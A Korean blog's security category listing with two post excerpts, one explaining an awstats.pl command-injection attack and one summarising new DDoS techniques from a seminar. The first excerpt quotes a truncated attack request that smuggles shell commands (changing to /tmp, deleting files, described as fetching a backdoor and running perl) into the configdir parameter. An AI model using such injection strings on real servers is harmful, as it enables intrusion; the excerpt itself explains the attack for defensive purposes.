보안 썸네일형 리스트형 최신 웹 해킹에 대응하는 방법!!! 최근 웹 애플리케이션의 취약성을 이용한 웹 해킹이 기승을 부리고 있다. 다음은 대표적인 웹 로그 분석 프로그램인 'awstats'의 취약성을 이용한 공격 사례다. 홍석범 | 오늘과 내일 과장 이는 GET 메소드로 해당 사이트에 특정 옵션을 주면 바로 시스템 명령어를 실행할 수 있다는 점을 이용한 것으로, 먼저 /tmp 디렉토리로 이동한 뒤 특정 사이트에서 백도어 파일을 다운로드하고 perl을 실행한다는 것을 알 수 있다. 이 때 awstats.pl에 SUID(Set User ID) 가 설정되지 않으면 웹 서버 권한으로 실행돼 nobody로 작동할 것이다. GET http://www.domain.com/awstats/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%2.. 더보기 DDos의 새로운 기법 최근 보안 관련 최대 이슈는 단연 DDoS(Distributed Denial of Service). 올해 국내에서도 유명포털, 금융사, 쇼핑몰, 게임사이트 등이 DDoS 공격으로 인한 피해를 입었다. 특히 DDoS 공격을 돈벌이로 이용하는 사례가 늘어나면서 기업들에게 더욱 위협적인 요소가 되고 있다. 과거의 DDoS 공격은 많은 양의 트래픽을 생성하여 네트워크 자원을 고갈시키는 것에 초점이 맞추어져 있었다. 그러나 최근 공격은 적은 양의 트래픽으로 공격 대상을 서비스 불가능 상태로 만들어버리는 방법에 초점이 맞추어져 있다. 또한 새롭고 복합적인 공격이 지속적으로 출현하면서 보안 담당자들을 곤혹스럽게 만들고 있다. 이 글에서는 지난 10월 한국침해사고대응협의회 주최로 열린 ‘Anti-DDoS 대작전’ 세미.. 더보기 이전 1 다음